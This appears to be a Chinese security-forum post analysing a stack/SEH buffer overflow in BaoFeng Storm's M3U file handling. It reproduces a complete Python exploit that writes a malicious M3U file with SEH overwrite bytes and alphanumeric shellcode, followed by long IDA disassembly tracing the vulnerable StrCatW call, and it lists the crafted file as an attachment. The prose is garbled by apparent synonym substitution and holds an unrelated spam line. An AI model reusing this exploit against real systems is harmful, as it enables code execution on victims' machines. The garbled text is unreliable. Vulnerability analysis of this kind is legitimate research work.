题目:温顺分析狂风影音读取m3u局势文献随意 作家联系: 作家:仙果 备注:保留版权,迎接转载,转载请注明出处。 0x1.题记 0x2.测试环境 0x3.分析经过 0x4.营救要津 0x5.总结 0x1.题记 某日惊见www.exploit-db网站上公布一则狂风影音的随意,是读取m3u局势文献的随意, 立即把POC下载风雅测试之,发现对滴版块也有用, 对应版块弹出贪图器,ShellCode 经过了措置,为纯字母的ShellCode,相称的劲爆啊, 因有职责的其他事情,莫妥当即进行分析,留到了今天把随意的旨趣进行了分析, 不敢独享我想炫耀,特来分享。文中未免有错漏之处,但愿人人莫要介意,毕竟作家乃是半说念落发, 实属不易,照旧属于菜鸟一类,迎接人人月旦指正。 0x2.测试环境 2.1 windows xp sp3_cn (实体机测试,莫得使用诬捏机) 2.2 Strom 2012_3.10.4.8_Cn 2.3 010editor windbg IDA5.5 0x3.分析经过 3.1 Poc代码 -db.com/exploits/12516
橾p在线观看 #!/usr/bin/env python
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Author: Lufeng Li and Qingshan Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
# Storm2012 3.10.4.16
# Storm2012 3.10.4.8
# Storm2012 3.10.3.17
# Storm2012 3.10.2.5
# Storm2012 3.10.1.12
#################################################################
# Code :
file= "baofeng.m3u"
junk ="\x41"*795
nseh="\x61\xe8\xe1"
seh="\xaa\xd7\x40"
jmp ="\x53\x53\x6d\x58\x6d\x05\x11\x22\x6d\x2d\x10\x22\x6d\xac\xe4"
nops ="\x42" * 110
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZA"
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
"NQKONQ90***Q8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA")
fobj=open(file,"w")
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()
.text:10004052 ; =============== S U B R O U T I N E ======================================= .text:10004052 .text:10004052 ; Attributes: bp-based frame .text:10004052 .text:10004052 ; int __cdecl sub_10004052(LPCWSTR lpFileName) .text:10004052 sub_10004052 proc near ; CODE XREF: sub_10003FCB+32p .text:10004052 .text:10004052 Buffer = byte ptr -40Ch .text:10004052 NumberOfBytesRead= dword ptr -0Ch .text:10004052 var_8 = byte ptr -8 .text:10004052 var_7 = byte ptr -7 .text:10004052 var_6 = byte ptr -6 .text:10004052 var_2 = byte ptr -2 .text:10004052 var_1 = byte ptr -1 .text:10004052 lpFileName = dword ptr 8 .text:10004052 .text:10004052 push ebp .text:10004053 mov ebp, esp .text:10004055 sub esp, 40Ch .text:1000405B push ebx .text:1000405C push esi .text:1000405D xor ebx, ebx .text:1000405F push edi .text:10004060 push ebx ; hTemplateFile .text:10004061 push 80h ; dwFlagsAndAttributes .text:10004066 push 3 ; dwCreationDisposition .text:10004068 push ebx ; lpSecurityAttributes .text:10004069 push 1 .text:1000406B pop esi .text:1000406C push esi ; dwShareMode .text:1000406D push 80000000h ; dwDesiredAccess .text:10004072 push [ebp+lpFileName] ; lpFileName .text:10004075 call ds:CreateFileW //开放文献 .text:1000407B mov edi, eax .text:1000407D cmp edi, 0FFFFFFFFh .text:10004080 jnz short loc_10004089 .text:10004082 xor eax, eax .text:10004084 jmp loc_10004146 .text:10004089 ; --------------------------------------------------------------------------- .text:10004089 .text:10004089 loc_10004089: ; CODE XREF: sub_10004052+2Ej .text:10004089 lea eax, [ebp+NumberOfBytesRead] .text:1000408C push ebx ; lpOverlapped .text:1000408D push eax ; lpNumberOfBytesRead .text:1000408E lea eax, [ebp+Buffer] .text:10004094 push 400h ; nNumberOfBytesToRead .text:10004099 push eax ; lpBuffer //读取的实质存到eax指向的内存中 .text:1000409A push edi ; hFile .text:1000409B mov [ebp+NumberOfBytesRead], ebx .text:1000409E call ds:ReadFile //在这里读取文献实质 .text:100040A4 test eax, eax .text:100040A6 jz loc_1000413B .text:100040CA mov cl, [ebp+eax+Buffer] .text:100040D1 cmp cl, [ebp+eax+var_8] .text:100040D5 jnz short loc_10004123 .text:100040D7 inc eax .text:100040D8 cmp eax, 3 .text:100040DB jb short loc_100040CA .text:100040DD xor eax, eax .text:100040DF loc_100040DF: ; CODE XREF: sub_10004052+9Ej .text:100040DF mov cl, [ebp+eax+Buffer] //读取文献的首字节 .text:100040E6 cmp cl, byte ptr [ebp+eax+lpFileName+2] //判断是否为UTF-8编码 .text:100040EA jnz short loc_10004123 //不是则跳往loc_10004123扩充 .text:100040EC inc eax .text:100040ED cmp eax, 2 .text:100040F0 jb short loc_100040DF .text:100040F2 xor eax, eax .................................................................................. .text:10004123 ; --------------------------------------------------------------------------- .text:10004123 .text:10004123 loc_10004123: ; CODE XREF: sub_10004052+83j .text:10004123 ; sub_10004052+98j ... .text:10004123 xor eax, eax .text:10004125 cmp [ebp+NumberOfBytesRead], ebx .text:10004128 jbe short loc_1000413D .text:1000412A .text:1000412A loc_1000412A: ; CODE XREF: sub_10004052+E5j .text:1000412A cmp [ebp+eax+Buffer], bl .text:10004131 jz short loc_1000413B .text:10004133 inc eax .text:10004134 cmp eax, [ebp+NumberOfBytesRead] .text:10004137 jb short loc_1000412A .text:10004139 jmp short loc_1000413D .text:1000413B ; --------------------------------------------------------------------------- .text:1000413B .text:1000413B loc_1000413B: ; CODE XREF: sub_10004052+54j .text:1000413B ; sub_10004052+C6j ... .text:1000413B xor esi, esi .text:1000413D .text:1000413D loc_1000413D: ; CODE XREF: sub_10004052+BCj .text:1000413D ; sub_10004052+CFj ... .text:1000413D push edi ; hObject //读取缓冲区大小eax=0x400 .text:1000413E call ds:CloseHandle //关闭文献句柄 .text:10004144 mov eax, esi .text:10004146 .text:10004146 loc_10004146: ; CODE XREF: sub_10004052+32j .text:10004146 pop edi .text:10004147 pop esi .text:10004148 pop ebx .text:10004149 leave .text:1000414A retn .text:1000414A sub_10004052 endp //跳出函数
.text:10003FFC push ebx ; lpFileName .text:10003FFD call sub_10004052 //在这里调用之前的函数 .text:10004002 test eax, eax .text:10004004 pop ecx .text:10004005 jnz short loc_10004018 //跳转到loc_10004018扩充 .text:10004007 .text:10004007 loc_10004007: ; CODE XREF: sub_10003FCB+24j .text:10004007 add esi, 4 .text:1000400A cmp esi, offset a_smpl ; ".smpl" .text:10004010 jb short loc_10003FE4 .text:10004012 .text:10004012 loc_10004012: ; CODE XREF: sub_10003FCB+9j .text:10004012 xor eax, eax .text:10004014 .text:10004014 loc_10004014: ; CODE XREF: sub_10003FCB+50j .text:10004014 pop edi .text:10004015 pop esi .text:10004016 pop ebx .text:10004017 retn //跳出函数 .text:10004018 ; --------------------------------------------------------------------------- .text:10004018 .text:10004018 loc_10004018: ; CODE XREF: sub_10003FCB+2Fj .text:10004018 ; sub_10003FCB+3Aj .text:10004018 push 1 .text:1000401A pop eax .text:1000401B jmp short loc_10004014 .text:1000401B sub_10003FCB endp
.text:10005FC2 push ebx ; lpFileName .text:10005FC3 mov edi, eax .text:10005FC5 call sub_10003FCB //在此处调用sub_10003FCB函数。 .text:10005FCA test eax, eax .text:10005FCC pop ecx .text:10005FCD jz loc_100062B1 .text:10005FD3 mov al, byte ptr [ebp+arg_4+3] .text:10005FD6 push esi .text:10005FD7 push esi .text:10005FD8 lea ecx, [ebp+pcchPath] .text:10005FDB mov byte ptr [ebp+pcchPath], al .text:10005FDE call sub_10002B49 .text:10005FE3 mov [ebp+var_14], eax .text:10005FE6 mov [ebp+var_10], esi .text:10005FE9 mov [ebp+var_4], esi .text:10005FEC mov esi, ds:StrCmpIW .text:10005FF2 push offset a_wax ; ".wax" .text:10005FF7 push edi .text:10005FF8 call esi ; StrCmpIW .text:10005FFA test eax, eax .text:10005FFC jz loc_100060E0 .text:10006002 push offset a_asx ; ".asx"
.text:1000604D loc_1000604D: ; CODE XREF: sub_10005F7F+BDj .text:1000604D push offset a_m3u ; ".m3u" //找到对应的m3u .text:10006052 push edi .text:10006053 call esi ; StrCmpIW .text:10006055 test eax, eax .text:10006057 jnz short loc_10006068 .text:10006059 lea eax, [ebp+pcchPath] .text:1000605C push eax ; int .text:1000605D push ebx ; File .text:1000605E call sub_1000696C //此函数把后续的实质读取到内存中,并以unicode局势存放。 .text:10006063 jmp loc_1000610A ......................................... text:1000610A loc_1000610A: ; CODE XREF: sub_10005F7F+C9j .text:1000610A ; sub_10005F7F+E4j ... .text:1000610A pop ecx .text:1000610B test eax, eax .text:1000610D pop ecx .text:1000610E jnz short loc_10006117 ....................... text:10006117 ; --------------------------------------------------------------------------- .text:10006117 .text:10006117 loc_10006117: ; CODE XREF: sub_10005F7F+16Fj .text:10006117 ; sub_10005F7F+17Fj ... .text:10006117 mov edi, ds:StrCpyNW .text:1000611D push 823h .text:10006122 lea eax, [ebp+pszPath] .text:10006128 push ebx .text:10006129 push eax .text:1000612A call edi ; StrCpyNW .text:1000612C lea eax, [ebp+pszPath] .text:10006132 xor ebx, ebx .text:10006134 push eax ; pszPath .text:10006135 mov [ebp+lpFileName], ebx .text:10006138 call ds:PathIsURLW .text:1000613E test eax, eax .text:10006140 jz short loc_10006164 ........................................ .text:10006164 ; --------------------------------------------------------------------------- .text:10006164 .text:10006164 loc_10006164: ; CODE XREF: sub_10005F7F+1C1j .text:10006164 lea eax, [ebp+pszPath] .text:1000616A push eax ; pszPath .text:1000616B call ds:PathRemoveFileSpecW .text:10006171 lea eax, [ebp+pszPath] .text:10006177 push eax ; pszPath .text:10006178 call ds:PathAddBackslashW .text:1000617E .text:1000617E loc_1000617E: ; CODE XREF: sub_10005F7F+1E3j .text:1000617E cmp [ebp+var_10], ebx .text:10006181 jnz short loc_10006198 .............................. .text:10006198 ; --------------------------------------------------------------------------- .text:10006198 .text:10006198 loc_10006198: ; CODE XREF: sub_10005F7F+202j .text:10006198 mov eax, [ebp+var_14] .text:1000619B mov esi, [eax] .text:1000619D cmp esi, eax .text:1000619F jz loc_100062A1 .text:100061A5 .text:100061A5 loc_100061A5: ; CODE XREF: sub_10005F7F+31Cj .text:100061A5 cmp [ebp+lpFileName], ebx .text:100061A8 jnz loc_10006259 .text:100061AE mov eax, [esi+0Ch] //[esi+0c]的地址指向UNICODE局势的填充的数据地址 .text:100061B1 cmp eax, ebx .text:100061B3 jnz short loc_100061BA ...................................... .text:100061BA .text:100061BA loc_100061BA: ; CODE XREF: sub_10005F7F+234j .text:100061BA push eax ; pszPath .text:100061BB call ds:PathIsURLW .text:100061C1 test eax, eax .text:100061C3 jnz short loc_100061F6 .text:100061C5 lea eax, [ebp+pszPath] .text:100061CB push 208h .text:100061D0 push eax .text:100061D1 lea eax, [ebp+var_648] .text:100061D7 push eax .text:100061D8 call edi ; StrCpyNW .text:100061DA mov eax, [esi+0Ch] .text:100061DD cmp eax, ebx .text:100061DF jnz short loc_100061E6 ............................. .text:100061E6 .text:100061E6 loc_100061E6: ; CODE XREF: sub_10005F7F+260j .text:100061E6 push eax .text:100061E7 lea eax, [ebp+var_648] .text:100061ED push eax .text:100061EE call ds:StrCatW //粉饰了函数的复返地址 .text:100061F4 jmp short loc_10006211 .................................................. .text:10006211 .text:10006211 loc_10006211: ; CODE XREF: sub_10005F7F+275j .text:10006211 lea eax, [ebp+var_648] .text:10006217 push eax ; pszPath .text:10006218 lea eax, [ebp+psz] .text:1000621E push eax ; pszBuf .text:1000621F call ds:PathCanonicalizeW .text:10006225 lea ecx, [ebp+var_30] .text:10006228 call sub_10001DD7 .text:1000622D mov ecx, [ebp+arg_4] .text:10006230 lea eax, [ebp+var_30] .text:10006233 push eax .text:10006234 mov byte ptr [ebp+var_4], 1 .text:10006238 call sub_10002680 //在这个函数中进行报错。
[贯注]传递专科常识、拓宽行业东说念主脉——看雪讲师团队等你加入!
上传的附件: MediaLib.dll.idb.zip (910.28kb,63次下载) MediaLib.dll.zip (108.38kb,59次下载) 温顺分析狂风影音读取m3u局势文献随意.zip (7.50kb,84次下载) baofeng.m3u.zip (0.50kb,70次下载)